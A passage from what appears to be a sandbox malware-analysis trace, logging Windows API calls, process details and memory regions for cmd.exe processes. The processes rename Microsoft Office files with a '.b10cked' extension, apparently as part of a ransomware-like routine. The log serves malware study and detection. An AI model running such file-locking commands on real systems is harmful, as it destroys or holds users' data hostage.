SetErrorMode (uMode=0x0) returned 0x0 [0162.500] SetErrorMode (uMode=0x1) returned 0x0 [0162.500] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1af280, lpFilePart=0x1aee10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x1aee10*="XLINTL32.REST.trx_dll.b10cked") returned 0x4d [0162.500] SetErrorMode (uMode=0x0) returned 0x1 [0162.500] SetLastError (dwErrCode=0x0) [0162.500] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0162.501] GetLastError () returned 0x2 [0162.501] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ae78c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae78c) returned 0x352138 [0162.501] FindNextFileW (in: hFindFile=0x352138, lpFindFileData=0x1ae78c | out: lpFindFileData=0x1ae78c) returned 0 [0162.501] GetLastError () returned 0x12 [0162.501] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0162.503] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x351cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351cc8) returned 0x352138 [0162.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1aea24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0162.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x1aea24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0162.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll")) returned 0x2020 [0162.503] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0162.504] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0162.504] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae9d8 | out: _Buffer=" 1") returned 9 [0162.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.504] GetFileType (hFile=0x7) returned 0x2 [0162.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.504] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae964 | out: lpMode=0x1ae964) returned 1 [0162.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae998 | out: lpConsoleScreenBufferInfo=0x1ae998) returned 1 [0162.505] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0162.505] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ae9d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0162.505] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae9bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ae9bc*=0x1a) returned 1 [0162.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.505] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.506] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.506] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.506] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.506] SetConsoleInputExeNameW () returned 0x1 [0162.506] GetConsoleOutputCP () returned 0x1b5 [0162.506] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.506] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.506] exit (_Code=0) Process: id = "277" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22321 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22322 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22323 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22324 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 22325 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22326 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22327 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22328 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22329 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22330 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22397 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22398 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22399 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22400 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 22401 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 22402 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22403 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22404 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22405 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22406 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22407 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22408 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22409 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22410 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22411 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 22412 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22413 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22414 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22415 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22416 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22417 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22418 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 22419 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 22420 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 341 os_tid = 0x86c [0162.395] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd5c | out: lpSystemTimeAsFileTime=0x18fd5c*(dwLowDateTime=0x9a2c0d80, dwHighDateTime=0x1d440a9)) [0162.395] GetCurrentProcessId () returned 0xfbc [0162.395] GetCurrentThreadId () returned 0x86c [0162.395] GetTickCount () returned 0x3139f [0162.395] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd54 | out: lpPerformanceCount=0x18fd54*=21918435085) returned 1 [0162.396] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.396] __set_app_type (_Type=0x1) [0162.396] __p__fmode () returned 0x76b331f4 [0162.396] __p__commode () returned 0x76b331fc [0162.396] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.396] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.396] GetCurrentThreadId () returned 0x86c [0162.396] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x86c) returned 0x38 [0162.397] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.397] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.397] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.397] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fcec | out: phkResult=0x18fcec*=0x0) returned 0x2 [0162.397] VirtualQuery (in: lpAddress=0x18fd23, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.397] GetConsoleOutputCP () returned 0x1b5 [0162.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.397] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.397] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.398] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.398] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.398] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.398] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.398] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.398] GetEnvironmentStringsW () returned 0x330210* [0162.399] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0162.399] GetEnvironmentStringsW () returned 0x330210* [0162.399] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0162.399] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec5c | out: phkResult=0x18ec5c*=0x40) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0xa0, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x0, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.399] RegCloseKey (hKey=0x40) returned 0x0 [0162.399] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec5c | out: phkResult=0x18ec5c*=0x40) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x0, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x9, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x9, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x9, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.400] RegCloseKey (hKey=0x40) returned 0x0 [0162.400] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.400] srand (_Seed=0x5b886384) [0162.400] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"" [0162.400] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"" [0162.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.400] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.401] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.401] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.401] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.401] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.401] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.401] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.401] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.401] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.401] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.401] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.402] GetEnvironmentStringsW () returned 0x332360* [0162.402] FreeEnvironmentStringsW (penv=0x332360) returned 1 [0162.402] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.402] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.402] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.402] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.402] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.402] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.402] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.402] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.402] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.402] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.402] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa28, lpFilePart=0x18fa24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa24*="Desktop") returned 0x18 [0162.402] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.403] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f7a4 | out: lpFindFileData=0x18f7a4) returned 0x3309f0 [0162.403] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0162.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f7a4 | out: lpFindFileData=0x18f7a4) returned 0x3309f0 [0162.403] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0162.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f7a4 | out: lpFindFileData=0x18f7a4) returned 0x3309f0 [0162.403] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0162.403] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.403] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.403] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.403] GetEnvironmentStringsW () returned 0x330210* [0162.404] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0162.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.404] GetConsoleOutputCP () returned 0x1b5 [0162.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.404] GetUserDefaultLCID () returned 0x409 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb68, cchData=128 | out: lpLCData="0") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb68, cchData=128 | out: lpLCData="0") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb68, cchData=128 | out: lpLCData="1") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") 